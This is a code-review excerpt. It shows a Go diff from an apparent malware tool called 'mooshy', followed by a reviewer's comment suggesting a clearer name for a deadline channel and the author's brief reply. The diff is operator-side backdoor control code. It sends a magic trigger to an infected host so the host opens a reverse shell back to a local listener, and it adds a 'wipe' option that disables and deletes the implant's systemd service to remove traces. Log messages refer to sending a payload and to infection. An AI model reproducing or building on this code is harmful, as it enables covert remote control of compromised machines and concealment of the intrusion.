cmd/mooshy/mooshy.go

```diff
@@ -405,50 +406,75 @@ func main() {
 
 		log.Printf("Payload sent. Infection may take a while...")
 	default:
+		var cmds []string
+		if *pre != "" {
+			cmds = append(cmds, *pre)
+		}
+		if *wipe {
+			cmds = append(cmds, []string{
+				fmt.Sprintf("systemctl disable %s.service", mooshy.ServiceName),
+				fmt.Sprintf("rm -f /lib/systemd/system/%s.service", mooshy.ServiceName),
+				fmt.Sprintf("rm -f /lib/systemd/%s", mooshy.ServiceName),
+				"systemctl daemon-reload",
+				fmt.Sprintf("systemctl stop %s.service", mooshy.ServiceName),
+			}...)
+		}
+
 		l, err := net.Listen("tcp4", *tcp)
 		if err != nil {
 			log.Fatalf("Failed to open reverse shell: %s", err)
 		}
 		log.Printf("TCP socket opened on %s", l.Addr())
 
-		conn, err := net.DialTimeout("tcp4", *addr, 5*time.Second)
-		if err != nil {
-			log.Fatalf("Failed to dial %s: %s", *addr, err)
-		}
-
 		_, port, err := net.SplitHostPort(l.Addr().String())
 		if err != nil {
 			log.Fatalf("Failed to parse port from %s: %s", l.Addr(), err)
 		}
 
-		_, err = conn.Write([]byte(mooshy.MagicNumber + port))
+		log.Printf("Connecting to %s...", *addr)
+		outConn, err := net.DialTimeout("tcp4", *addr, 5*time.Second)
 		if err != nil {
-			log.Fatalf("Failed to send magic number to %s: %s", *addr, err)
+			log.Fatalf("Failed to dial %s: %s", *addr, err)
 		}
+		defer outConn.Close()
 
-		conn, err = l.Accept()
-		if err != nil {
-			log.Fatalf("Failed to accept connection on %s: %s", l.Addr(), err)
-		}
-		log.Printf("Received connection from %s", conn.RemoteAddr())
-		defer conn.Close()
+		ch := make(chan net.Conn, 1)
+		go func() {
+			conn, err := l.Accept()
+			if err != nil {
+				log.Fatalf("Failed to accept connection on %s: %s", l.Addr(), err)
+			}
+			log.Printf("Received connection from %s", conn.RemoteAddr())
+			ch <- conn
+		}()
+
+		deadlineTime := time.After(time.Duration(*deadline) * time.Second)
```

Comment:
This is quite confusing, as this value is not a `time.Time`, but a `chan` - something like `deadlineCh` could fit this better.

Reply:
Ah, I didn't notice that.